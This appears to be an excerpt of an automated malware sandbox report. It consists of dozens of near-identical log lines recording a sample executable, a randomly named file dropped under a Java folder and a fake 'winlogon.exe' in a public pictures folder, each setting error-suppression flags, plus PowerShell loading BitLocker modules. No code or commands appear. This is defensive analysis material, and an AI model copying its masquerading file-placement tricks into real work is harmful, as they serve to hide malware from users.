                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
